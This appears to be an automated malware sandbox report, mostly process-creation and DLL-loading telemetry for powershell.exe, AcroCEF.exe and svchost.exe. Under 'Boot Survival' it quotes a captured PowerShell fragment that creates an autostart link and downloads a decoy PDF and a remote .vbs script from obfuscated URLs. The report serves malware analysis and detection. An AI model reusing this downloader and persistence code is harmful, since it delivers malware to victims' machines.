      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbl source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1404370506.000001E357BFD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BACC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BACC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$M| source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb) source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000001.00000002.1618094806.0000025F5B805000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbFu source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb6vi source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeN source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb7M source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAB780953 push E95B7DD0h; ret 1_2_00007FFAAB7809C9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB850D6C push eax; ret 4_2_00007FFAAB850D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htctewww.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.pdf';getit -fz $flol -oulv 'http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
